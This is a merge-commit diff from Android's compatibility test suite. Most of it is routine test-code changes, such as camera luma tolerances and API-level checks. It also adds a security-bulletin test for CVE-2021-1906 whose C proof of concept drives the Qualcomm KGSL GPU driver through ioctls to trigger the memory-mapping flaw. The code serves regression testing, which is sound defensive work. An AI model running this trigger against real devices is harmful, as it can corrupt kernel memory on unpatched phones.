Merge "S V2 is now 32" into sc-v2-dev
diff --git a/apps/CameraITS/tests/scene1_1/test_ev_compensation_advanced.py b/apps/CameraITS/tests/scene1_1/test_ev_compensation_advanced.py
index 4f589ce..710e207 100644
--- a/apps/CameraITS/tests/scene1_1/test_ev_compensation_advanced.py
+++ b/apps/CameraITS/tests/scene1_1/test_ev_compensation_advanced.py
@@ -15,11 +15,11 @@
import logging
+import math
import os.path
import matplotlib
from matplotlib import pylab
from mobly import test_runner
-import numpy as np
import its_base_test
import camera_properties_utils
@@ -29,17 +29,15 @@
LINEAR_TONEMAP_CURVE = [0.0, 0.0, 1.0, 1.0]
LOCKED = 3
-LUMA_DELTA_THRESH = 0.05
-LUMA_LOCKED_TOL = 0.05
+LUMA_DELTA_ATOL = 0.05
+LUMA_DELTA_ATOL_SAT = 0.10
+LUMA_SAT_THRESH = 0.75 # luma value at which ATOL changes from MID to SAT
NAME = os.path.splitext(os.path.basename(__file__))[0]
PATCH_H = 0.1 # center 10%
PATCH_W = 0.1
PATCH_X = 0.5 - PATCH_W/2
PATCH_Y = 0.5 - PATCH_H/2
THRESH_CONVERGE_FOR_EV = 8 # AE must converge within this num auto reqs for EV
-YUV_FULL_SCALE = 255.0
-YUV_SAT_MIN = 250.0
-YUV_SAT_TOL = 3.0
def create_request_with_ev(ev):
@@ -122,6 +120,10 @@
caps = cam.do_capture([req]*THRESH_CONVERGE_FOR_EV, fmt)
for cap in caps:
if cap['metadata']['android.control.aeState'] == LOCKED:
+ ev_meta = cap['metadata']['android.control.aeExposureCompensation']
+ if ev_meta != ev:
+ raise AssertionError(
+ f'EV comp capture != request! cap: {ev_meta}, req: {ev}')
lumas.append(extract_luma_from_capture(cap))
break
if caps[THRESH_CONVERGE_FOR_EV-1]['metadata'][
@@ -133,6 +135,8 @@
i_mid = len(ev_steps) // 2
luma_normal = lumas[i_mid] / ev_shifts[i_mid]
expected_lumas = [min(1.0, luma_normal*shift) for shift in ev_shifts]
+ luma_delta_atols = [LUMA_DELTA_ATOL if l < LUMA_SAT_THRESH
+ else LUMA_DELTA_ATOL_SAT for l in expected_lumas]
# Create plot
pylab.figure(NAME)
@@ -145,17 +149,15 @@
matplotlib.pyplot.savefig(
'%s_plot_means.png' % os.path.join(log_path, NAME))
- luma_diffs = [expected_lumas[i]-lumas[i] for i in range(len(ev_steps))]
- max_diff = max(abs(i) for i in luma_diffs)
- avg_diff = abs(np.array(luma_diffs)).mean()
- logging.debug(
- 'Max delta between modeled and measured lumas: %.4f', max_diff)
- logging.debug(
- 'Avg delta between modeled and measured lumas: %.4f', avg_diff)
- if max_diff > LUMA_DELTA_THRESH:
- raise AssertionError(f'Max delta between modeled and measured '
- f'lumas: {max_diff:.3f}, '
- f'TOL: {LUMA_DELTA_THRESH}.')
+ for i, luma in enumerate(lumas):
+ luma_delta_atol = luma_delta_atols[i]
+ logging.debug('EV step: %3d, luma: %.3f, model: %.3f, ATOL: %.2f',
+ ev_steps[i], luma, expected_lumas[i], luma_delta_atol)
+ if not math.isclose(luma, expected_lumas[i],
+ abs_tol=luma_delta_atol):
+ raise AssertionError('Modeled/measured luma deltas too large! '
+ f'meas: {lumas[i]}, model: {expected_lumas[i]}, '
+ f'ATOL: {luma_delta_atol}.')
if __name__ == '__main__':
diff --git a/apps/CtsVerifier/src/com/android/cts/verifier/security/SecurityModeFeatureVerifierActivity.java b/apps/CtsVerifier/src/com/android/cts/verifier/security/SecurityModeFeatureVerifierActivity.java
index d7e6ddb..43a8c18 100644
--- a/apps/CtsVerifier/src/com/android/cts/verifier/security/SecurityModeFeatureVerifierActivity.java
+++ b/apps/CtsVerifier/src/com/android/cts/verifier/security/SecurityModeFeatureVerifierActivity.java
@@ -16,19 +16,19 @@
package com.android.cts.verifier.security;
-import static android.os.Build.VERSION;
import static android.os.Build.VERSION_CODES;
+import static com.android.compatibility.common.util.PropertyUtil.getFirstApiLevel;
+import static com.android.compatibility.common.util.PropertyUtil.getVendorApiLevel;
+
import android.content.pm.PackageManager;
import android.os.Bundle;
-import android.os.SystemProperties;
import android.view.View;
import android.view.View.OnClickListener;
import android.widget.Button;
import android.widget.ImageView;
import android.widget.TextView;
-
import com.android.cts.verifier.PassFailButtons;
import com.android.cts.verifier.R;
@@ -60,9 +60,8 @@
mHandheldOrTabletOkButton = (Button) findViewById(R.id.handheld_or_tablet_yes);
mHandheldOrTabletNaButton = (Button) findViewById(R.id.handheld_or_tablet_not_applicable);
- final int firstApiLevel =
- SystemProperties.getInt("ro.product.first_api_level", VERSION.SDK_INT);
- mDeviceLaunchedBeforeS = firstApiLevel < VERSION_CODES.S;
+ // Devices launched before S will always pass the test.
+ mDeviceLaunchedBeforeS = isLaunchedBeforeS();
mFeatureAvailable = getPackageManager()
.hasSystemFeature(PackageManager.FEATURE_SECURITY_MODEL_COMPATIBLE);
@@ -81,4 +80,8 @@
}
});
}
+
+ private static boolean isLaunchedBeforeS() {
+ return Math.min(getFirstApiLevel(), getVendorApiLevel()) < VERSION_CODES.S;
+ }
}
diff --git a/apps/TtsTestApp/AndroidManifest.xml b/apps/TtsTestApp/AndroidManifest.xml
index 5fdac07..26616fc 100644
--- a/apps/TtsTestApp/AndroidManifest.xml
+++ b/apps/TtsTestApp/AndroidManifest.xml
@@ -12,5 +12,25 @@
<category android:name="android.intent.category.DEFAULT" />
</intent-filter>
</service>
+ <activity
+ android:name="CheckVoiceData"
+ android:directBootAware="true"
+ android:exported="true"
+ android:theme="@android:style/Theme.NoDisplay">
+ <intent-filter>
+ <action android:name="android.speech.tts.engine.CHECK_TTS_DATA"/>
+ <category android:name="android.intent.category.DEFAULT"/>
+ </intent-filter>
+ </activity>
+ <activity
+ android:name="GetSampleText"
+ android:directBootAware="true"
+ android:exported="true"
+ android:theme="@android:style/Theme.NoDisplay">
+ <intent-filter>
+ <action android:name="android.speech.tts.engine.GET_SAMPLE_TEXT"/>
+ <category android:name="android.intent.category.DEFAULT"/>
+ </intent-filter>
+ </activity>
</application>
</manifest>
diff --git a/apps/TtsTestApp/src/com/android/cts/tts/helper/CheckVoiceData.java b/apps/TtsTestApp/src/com/android/cts/tts/helper/CheckVoiceData.java
new file mode 100644
index 0000000..aa2367f
--- /dev/null
+++ b/apps/TtsTestApp/src/com/android/cts/tts/helper/CheckVoiceData.java
@@ -0,0 +1,52 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package com.android.cts.tts.helper;
+
+import android.app.Activity;
+import android.content.Intent;
+import android.os.Bundle;
+import android.speech.tts.TextToSpeech;
+
+import java.util.ArrayList;
+import java.util.HashSet;
+import java.util.Set;
+
+/** Activity called by the framework to return the list the installable voices. */
+public class CheckVoiceData extends Activity {
+ @Override
+ protected void onCreate(Bundle savedInstanceState) {
+ super.onCreate(savedInstanceState);
+
+ final Set<String> availableVoices = new HashSet<>();
+ availableVoices.add("eng-USA");
+ availableVoices.add("");
+
+ // Populate a test list of languages that are available at the server.
+ final Intent returnVal = new Intent();
+ ArrayList<String> availableVoicesList = new ArrayList<>(availableVoices);
+ returnVal.putStringArrayListExtra(
+ TextToSpeech.Engine.EXTRA_AVAILABLE_VOICES, availableVoicesList);
+
+ // Populate a test list of languages that are unavailable at the server.
+ ArrayList<String> unavailableVoicesList = new ArrayList<>();
+ unavailableVoicesList.add("");
+ returnVal.putStringArrayListExtra(
+ TextToSpeech.Engine.EXTRA_UNAVAILABLE_VOICES, unavailableVoicesList);
+
+ setResult(TextToSpeech.Engine.CHECK_VOICE_DATA_PASS, returnVal);
+ finish();
+ }
+}
diff --git a/apps/TtsTestApp/src/com/android/cts/tts/helper/GetSampleText.java b/apps/TtsTestApp/src/com/android/cts/tts/helper/GetSampleText.java
new file mode 100644
index 0000000..f5c1615
--- /dev/null
+++ b/apps/TtsTestApp/src/com/android/cts/tts/helper/GetSampleText.java
@@ -0,0 +1,38 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package com.android.cts.tts.helper;
+
+import android.app.Activity;
+import android.content.Intent;
+import android.os.Bundle;
+import android.speech.tts.TextToSpeech;
+
+/**
+ * Activity called from Settings application to get a
+ * sample string for an example of synthesis.
+ */
+public class GetSampleText extends Activity {
+
+ @Override
+ protected void onCreate(Bundle savedInstanceState) {
+ super.onCreate(savedInstanceState);
+ final Intent resultIntent = new Intent();
+
+ resultIntent.putExtra("sampleText", "sample text");
+ setResult(TextToSpeech.LANG_AVAILABLE, resultIntent);
+ finish();
+ }
+}
diff --git a/hostsidetests/appsecurity/src/android/appsecurity/cts/ApkVerityInstallTest.java b/hostsidetests/appsecurity/src/android/appsecurity/cts/ApkVerityInstallTest.java
index 3524357..620c9eb 100644
--- a/hostsidetests/appsecurity/src/android/appsecurity/cts/ApkVerityInstallTest.java
+++ b/hostsidetests/appsecurity/src/android/appsecurity/cts/ApkVerityInstallTest.java
@@ -19,6 +19,9 @@
import static org.junit.Assert.fail;
import static org.junit.Assume.assumeTrue;
+import static com.android.compatibility.common.util.PropertyUtil.getFirstApiLevel;
+import static com.android.compatibility.common.util.PropertyUtil.getVendorApiLevel;
+
import android.platform.test.annotations.AppModeFull;
import com.android.compatibility.common.util.CddTest;
@@ -435,7 +438,9 @@
private void assumeSecurityModelCompat() throws DeviceNotAvailableException {
// This feature name check only applies to devices that first shipped with
// SC or later.
- if (mLaunchApiLevel >= 31) {
+ final int firstApiLevel =
+ Math.min(getFirstApiLevel(getDevice()), getVendorApiLevel(getDevice()));
+ if (firstApiLevel >= 31) {
assumeTrue("Skipping test: FEATURE_SECURITY_MODEL_COMPATIBLE missing.",
getDevice().hasFeature("feature:android.hardware.security.model.compatible"));
}
diff --git a/hostsidetests/appsecurity/src/android/appsecurity/cts/DirectBootHostTest.java b/hostsidetests/appsecurity/src/android/appsecurity/cts/DirectBootHostTest.java
index 0abb593..e513aa7 100644
--- a/hostsidetests/appsecurity/src/android/appsecurity/cts/DirectBootHostTest.java
+++ b/hostsidetests/appsecurity/src/android/appsecurity/cts/DirectBootHostTest.java
@@ -18,6 +18,9 @@
import static android.appsecurity.cts.Utils.waitForBootCompleted;
+import static com.android.compatibility.common.util.PropertyUtil.getFirstApiLevel;
+import static com.android.compatibility.common.util.PropertyUtil.getVendorApiLevel;
+
import static org.junit.Assert.assertNotNull;
import static org.junit.Assert.assertTrue;
import static org.junit.Assume.assumeFalse;
@@ -25,7 +28,6 @@
import android.platform.test.annotations.RequiresDevice;
-import com.android.compatibility.common.util.PropertyUtil;
import com.android.tradefed.device.DeviceNotAvailableException;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
import com.android.tradefed.testtype.junit4.BaseHostJUnit4Test;
@@ -205,7 +207,9 @@
getDevice().hasFeature(FEATURE_SECURE_LOCK_SCREEN));
// This feature name check only applies to devices that first shipped with
// SC or later.
- if (PropertyUtil.getFirstApiLevel(getDevice()) >= 31) {
+ final int firstApiLevel =
+ Math.min(getFirstApiLevel(getDevice()), getVendorApiLevel(getDevice()));
+ if (firstApiLevel >= 31) {
assumeTrue("Skipping test: FEATURE_SECURITY_MODEL_COMPATIBLE missing.",
getDevice().hasFeature("feature:android.hardware.security.model.compatible"));
}
diff --git a/hostsidetests/security/src/android/security/cts/KernelConfigTest.java b/hostsidetests/security/src/android/security/cts/KernelConfigTest.java
index 11be8cb..3223f46 100644
--- a/hostsidetests/security/src/android/security/cts/KernelConfigTest.java
+++ b/hostsidetests/security/src/android/security/cts/KernelConfigTest.java
@@ -408,7 +408,9 @@
private void assumeSecurityModelCompat() throws Exception {
// This feature name check only applies to devices that first shipped with
// SC or later.
- if (PropertyUtil.getFirstApiLevel(mDevice) >= 31) {
+ final int firstApiLevel = Math.min(PropertyUtil.getFirstApiLevel(mDevice),
+ PropertyUtil.getVendorApiLevel(mDevice));
+ if (firstApiLevel >= 31) {
assumeTrue("Skipping test: FEATURE_SECURITY_MODEL_COMPATIBLE missing.",
getDevice().hasFeature("feature:android.hardware.security.model.compatible"));
}
diff --git a/hostsidetests/security/src/android/security/cts/MetadataEncryptionTest.java b/hostsidetests/security/src/android/security/cts/MetadataEncryptionTest.java
index d9da47a..1351be9 100644
--- a/hostsidetests/security/src/android/security/cts/MetadataEncryptionTest.java
+++ b/hostsidetests/security/src/android/security/cts/MetadataEncryptionTest.java
@@ -70,7 +70,9 @@
private void assumeSecurityModelCompat() throws Exception {
// This feature name check only applies to devices that first shipped with
// SC or later.
- if (PropertyUtil.getFirstApiLevel(mDevice) >= 31) {
+ final int firstApiLevel = Math.min(PropertyUtil.getFirstApiLevel(mDevice),
+ PropertyUtil.getVendorApiLevel(mDevice));
+ if (firstApiLevel >= 31) {
assumeTrue("Skipping test: FEATURE_SECURITY_MODEL_COMPATIBLE missing.",
getDevice().hasFeature("feature:android.hardware.security.model.compatible"));
}
diff --git a/hostsidetests/security/src/android/security/cts/PerfEventParanoidTest.java b/hostsidetests/security/src/android/security/cts/PerfEventParanoidTest.java
index 6122e09..35a9942 100644
--- a/hostsidetests/security/src/android/security/cts/PerfEventParanoidTest.java
+++ b/hostsidetests/security/src/android/security/cts/PerfEventParanoidTest.java
@@ -89,7 +89,9 @@
private void assumeSecurityModelCompat() throws DeviceNotAvailableException {
// This feature name check only applies to devices that first shipped with
// SC or later.
- if (PropertyUtil.getFirstApiLevel(mDevice) >= ANDROID_S_API_LEVEL) {
+ final int firstApiLevel = Math.min(PropertyUtil.getFirstApiLevel(mDevice),
+ PropertyUtil.getVendorApiLevel(mDevice));
+ if (firstApiLevel >= ANDROID_S_API_LEVEL) {
assumeTrue("Skipping test: FEATURE_SECURITY_MODEL_COMPATIBLE missing.",
getDevice().hasFeature("feature:android.hardware.security.model.compatible"));
}
diff --git a/hostsidetests/security/src/android/security/cts/SELinuxHostTest.java b/hostsidetests/security/src/android/security/cts/SELinuxHostTest.java
index 7fc8431..3ec96e3 100644
--- a/hostsidetests/security/src/android/security/cts/SELinuxHostTest.java
+++ b/hostsidetests/security/src/android/security/cts/SELinuxHostTest.java
@@ -189,7 +189,9 @@
private void assumeSecurityModelCompat() throws Exception {
// This feature name check only applies to devices that first shipped with
// SC or later.
- if (PropertyUtil.getFirstApiLevel(mDevice) >= 31) {
+ final int firstApiLevel = Math.min(PropertyUtil.getFirstApiLevel(mDevice),
+ PropertyUtil.getVendorApiLevel(mDevice));
+ if (firstApiLevel >= 31) {
assumeTrue("Skipping test: FEATURE_SECURITY_MODEL_COMPATIBLE missing.",
getDevice().hasFeature("feature:android.hardware.security.model.compatible"));
}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-1906/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-1906/Android.bp
new file mode 100644
index 0000000..86e17dc
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-1906/Android.bp
@@ -0,0 +1,7 @@
+cc_test {
+ name: "CVE-2021-1906",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.c",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-1906/msm_kgsl.h b/hostsidetests/securitybulletin/securityPatch/CVE-2021-1906/msm_kgsl.h
new file mode 100644
index 0000000..9163217
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-1906/msm_kgsl.h
@@ -0,0 +1,90 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define KGSL_MEMFLAGS_USE_CPU_MAP 0x10000000ULL
+#define KGSL_MEMFLAGS_GPUREADONLY 0x01000000U
+#define KGSL_IOC_TYPE 0x09
+#define KGSL_MEMTYPE_COMMAND 16
+
+enum kgsl_user_mem_type {
+ KGSL_USER_MEM_TYPE_PMEM = 0x00000000,
+ KGSL_USER_MEM_TYPE_ASHMEM = 0x00000001,
+ KGSL_USER_MEM_TYPE_ADDR = 0x00000002,
+ KGSL_USER_MEM_TYPE_ION = 0x00000003,
+ KGSL_USER_MEM_TYPE_DMABUF = 0x00000003,
+ KGSL_USER_MEM_TYPE_MAX = 0x00000007,
+};
+
+struct kgsl_drawctxt_create {
+ unsigned int flags;
+ unsigned int drawctxt_id;
+};
+
+#define IOCTL_KGSL_DRAWCTXT_CREATE \
+ _IOWR(KGSL_IOC_TYPE, 0x13, struct kgsl_drawctxt_create)
+
+struct kgsl_map_user_mem {
+ int fd;
+ unsigned long gpuaddr;
+ size_t len;
+ size_t offset;
+ unsigned long hostptr;
+ enum kgsl_user_mem_type memtype;
+ unsigned int flags;
+};
+
+#define IOCTL_KGSL_MAP_USER_MEM \
+ _IOWR(KGSL_IOC_TYPE, 0x15, struct kgsl_map_user_mem)
+
+struct kgsl_sharedmem_free {
+ unsigned long gpuaddr;
+};
+
+#define IOCTL_KGSL_SHAREDMEM_FREE \
+ _IOW(KGSL_IOC_TYPE, 0x21, struct kgsl_sharedmem_free)
+
+struct kgsl_gpumem_alloc {
+ unsigned long gpuaddr;
+ size_t size;
+ unsigned int flags;
+};
+
+#define IOCTL_KGSL_GPUMEM_ALLOC \
+ _IOWR(KGSL_IOC_TYPE, 0x2f, struct kgsl_gpumem_alloc)
+
+struct kgsl_gpumem_alloc_id {
+ unsigned int id;
+ unsigned int flags;
+ size_t size;
+ size_t mmapsize;
+ unsigned long gpuaddr;
+ unsigned long __pad[2];
+};
+
+#define IOCTL_KGSL_GPUMEM_ALLOC_ID \
+ _IOWR(KGSL_IOC_TYPE, 0x34, struct kgsl_gpumem_alloc_id)
+
+struct kgsl_gpumem_get_info {
+ unsigned long gpuaddr;
+ unsigned int id;
+ unsigned int flags;
+ size_t size;
+ size_t mmapsize;
+ unsigned long useraddr;
+ unsigned long __pad[4];
+};
+
+#define IOCTL_KGSL_GPUMEM_GET_INFO \
+ _IOWR(KGSL_IOC_TYPE, 0x36, struct kgsl_gpumem_get_info)
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-1906/poc.c b/hostsidetests/securitybulletin/securityPatch/CVE-2021-1906/poc.c
new file mode 100644
index 0000000..f8eaee4
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-1906/poc.c
@@ -0,0 +1,173 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+/*
+ * CVE-2021-1906
+ */
+
+#include <fcntl.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <sys/wait.h>
+#include <unistd.h>
+
+#include "../includes/common.h"
+#include "msm_kgsl.h"
+
+static void *code_page_cpu_addr = MAP_FAILED;
+static unsigned long code_page_gpu_addr = 0;
+
+#define int64 int64_t
+#define EXPLOIT_VULN_ADDR 0xdff00000
+
+unsigned int ctx_id = 0;
+
+int gpu_mem_alloc_id(int fd, int size, int flags,
+ struct kgsl_gpumem_alloc_id *alloc) {
+ int ret = -1;
+ alloc->flags = flags;
+ alloc->size = size;
+
+ ret = ioctl(fd, IOCTL_KGSL_GPUMEM_ALLOC_ID, alloc);
+ return ret;
+}
+
+int gpu_sharedmem_free(int fd, unsigned long gpu_addr) {
+ struct kgsl_sharedmem_free addr;
+ int ret = -1;
+ addr.gpuaddr = gpu_addr;
+ ret = ioctl(fd, IOCTL_KGSL_SHAREDMEM_FREE, &addr);
+ return ret;
+}
+
+unsigned long gpu_mem_alloc(int fd, int size, unsigned int flags) {
+ struct kgsl_gpumem_alloc alloc = {0};
+ alloc.size = size;
+ alloc.flags = flags;
+
+ if (ioctl(fd, IOCTL_KGSL_GPUMEM_ALLOC, &alloc) < 0) {
+ return -1;
+ }
+ return alloc.gpuaddr;
+}
+
+int gpu_mem_get_info_from_id(int fd, int id,
+ struct kgsl_gpumem_get_info *info) {
+ int ret = -1;
+ info->id = id;
+ info->gpuaddr = 0;
+ ret = ioctl(fd, IOCTL_KGSL_GPUMEM_GET_INFO, info);
+ return ret;
+}
+
+int kgsl_init() {
+ int kgsl = open("/dev/kgsl-3d0", O_RDWR | O_LARGEFILE);
+ if (kgsl < 0) {
+ return -1;
+ }
+
+ struct kgsl_drawctxt_create ctxc;
+ ctxc.flags = 0x1010D2;
+ ctxc.drawctxt_id = 0;
+ if (ioctl(kgsl, IOCTL_KGSL_DRAWCTXT_CREATE, &ctxc) < 0) {
+ return -1;
+ }
+ ctx_id = ctxc.drawctxt_id;
+ return kgsl;
+}
+
+int gpu_map_user_mem(int fd, uintptr_t addr, size_t size, size_t offset,
+ unsigned int flags, unsigned long *gpu_addr) {
+ struct kgsl_map_user_mem user_mem = {0};
+ int result = 0;
+
+ user_mem.fd = -1;
+ user_mem.gpuaddr = 0;
+ user_mem.len = size;
+ user_mem.offset = offset;
+ user_mem.hostptr = addr;
+ user_mem.flags = flags;
+ user_mem.memtype = KGSL_USER_MEM_TYPE_ADDR;
+
+ result = ioctl(fd, IOCTL_KGSL_MAP_USER_MEM, &user_mem);
+ if (gpu_addr) {
+ *gpu_addr = user_mem.gpuaddr;
+ }
+ return result;
+}
+
+int create_code_page(int fd, int size, void **cpu_addr,
+ unsigned long *gpu_addr) {
+ struct kgsl_gpumem_alloc_id alloc = {0};
+ struct kgsl_gpumem_get_info info = {0};
+ void *cpu_mapping = MAP_FAILED;
+
+ if (gpu_mem_alloc_id(fd, size,
+ KGSL_MEMFLAGS_USE_CPU_MAP | KGSL_MEMFLAGS_GPUREADONLY |
+ KGSL_MEMTYPE_COMMAND,
+ &alloc) < 0) {
+ return -1;
+ }
+
+ cpu_mapping =
+ mmap(NULL, size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, alloc.id << 12);
+ if (cpu_mapping == MAP_FAILED) {
+ return -1;
+ }
+
+ if (gpu_mem_get_info_from_id(fd, alloc.id, &info) < 0) {
+ return -1;
+ }
+
+ *cpu_addr = cpu_mapping;
+ *gpu_addr = info.gpuaddr;
+ return 0;
+}
+
+void trigger(int fd, uintptr_t start, uintptr_t end) {
+ void *hostptr = mmap((void *)start, 2 * PAGE_SIZE, PROT_READ | PROT_WRITE,
+ MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);
+ mprotect((void *)((uintptr_t)hostptr + PAGE_SIZE), PAGE_SIZE, PROT_NONE);
+
+ gpu_map_user_mem(fd, (uintptr_t)hostptr, end - start, 0,
+ KGSL_MEMFLAGS_USE_CPU_MAP, NULL);
+ munmap(hostptr, 2 * PAGE_SIZE);
+}
+
+int main(void) {
+ int kgsl_fd = kgsl_init();
+ unsigned long gpu_addr = 0;
+ unsigned long next_gpu_addr = 0;
+
+ FAIL_CHECK(!(kgsl_fd < 0));
+
+ if (create_code_page(kgsl_fd, 4 * PAGE_SIZE, &code_page_cpu_addr,
+ &code_page_gpu_addr) < 0) {
+ close(kgsl_fd);
+ return EXIT_FAILURE;
+ }
+
+ next_gpu_addr = gpu_mem_alloc(kgsl_fd, PAGE_SIZE, 0);
+ gpu_sharedmem_free(kgsl_fd, next_gpu_addr);
+ trigger(kgsl_fd, next_gpu_addr, EXPLOIT_VULN_ADDR);
+ gpu_addr = gpu_mem_alloc(kgsl_fd, 0x600000, 0);
+
+ close(kgsl_fd);
+ return (gpu_addr == EXPLOIT_VULN_ADDR) ? EXIT_VULNERABLE : EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_1906.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_1906.java
new file mode 100644
index 0000000..bfa056b
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_1906.java
@@ -0,0 +1,38 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package android.security.cts;
+
+import static org.junit.Assert.*;
+import static org.junit.Assume.*;
+
+import android.platform.test.annotations.AsbSecurityTest;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2021_1906 extends SecurityTestCase {
+
+ /**
+ * CVE-2021-1906
+ */
+ @AsbSecurityTest(cveBugId = 178810049)
+ @Test
+ public void testPocCVE_2021_1906() throws Exception {
+ assumeTrue(containsDriver(getDevice(), "/dev/kgsl-3d0"));
+ AdbUtils.runPocAssertExitStatusNotVulnerable("CVE-2021-1906", getDevice(), 60);
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/DeviceTest.java
index 233fdb4..bb6631a 100644
--- a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/DeviceTest.java
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/DeviceTest.java
@@ -19,7 +19,6 @@
import org.junit.Test;
import org.junit.runner.RunWith;
-import android.content.ActivityNotFoundException;
import android.content.Context;
import android.content.Intent;
import android.content.pm.PackageManager;
@@ -32,7 +31,6 @@
import static androidx.test.core.app.ApplicationProvider.getApplicationContext;
import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
import static org.junit.Assert.assertFalse;
-import static org.junit.Assume.assumeNoException;
@RunWith(AndroidJUnit4.class)
public class DeviceTest {
@@ -56,12 +54,6 @@
intent.addFlags(Intent.FLAG_ACTIVITY_CLEAR_TASK);
intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
context.startActivity(intent);
- try{
- context.startActivity(intent);
- } catch(ActivityNotFoundException e){
- assumeNoException(e);
- return;
- }
//wait for poc app to complete (it takes about 6 seconds)
SystemClock.sleep(20000);
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/Trigger.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/Trigger.java
index 987b161..fe278c9 100644
--- a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/Trigger.java
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/Trigger.java
@@ -1,5 +1,6 @@
package android.security.cts.CVE_2021_0921;
+import android.content.ActivityNotFoundException;
import android.content.ComponentName;
import android.content.Context;
import android.content.Intent;
@@ -9,6 +10,8 @@
import java.io.File;
+import static org.junit.Assume.assumeNoException;
+
public class Trigger {
private static final String TAG = "TAG_2021_0921.Triggger";
private Context mContext;
@@ -35,7 +38,12 @@
String authTypes[] = {"android.security.cts"};
intent.putExtra("account_types", authTypes);
- mContext.startActivity(intent);
+
+ try {
+ mContext.startActivity(intent);
+ } catch (ActivityNotFoundException e) {
+ assumeNoException(e);
+ }
Log.d(TAG, "accountSettings() end");
}
}
diff --git a/tests/tests/hardware/src/android/hardware/cts/SecurityModelFeatureTest.java b/tests/tests/hardware/src/android/hardware/cts/SecurityModelFeatureTest.java
index 810aebc..b94877f 100644
--- a/tests/tests/hardware/src/android/hardware/cts/SecurityModelFeatureTest.java
+++ b/tests/tests/hardware/src/android/hardware/cts/SecurityModelFeatureTest.java
@@ -16,14 +16,15 @@
package android.hardware.cts;
-import static android.os.Build.VERSION;
import static android.os.Build.VERSION_CODES;
+import static com.android.compatibility.common.util.PropertyUtil.getFirstApiLevel;
+import static com.android.compatibility.common.util.PropertyUtil.getVendorApiLevel;
+
import static org.junit.Assert.assertTrue;
import static org.junit.Assume.assumeTrue;
import android.content.pm.PackageManager;
-import android.os.SystemProperties;
import androidx.test.InstrumentationRegistry;
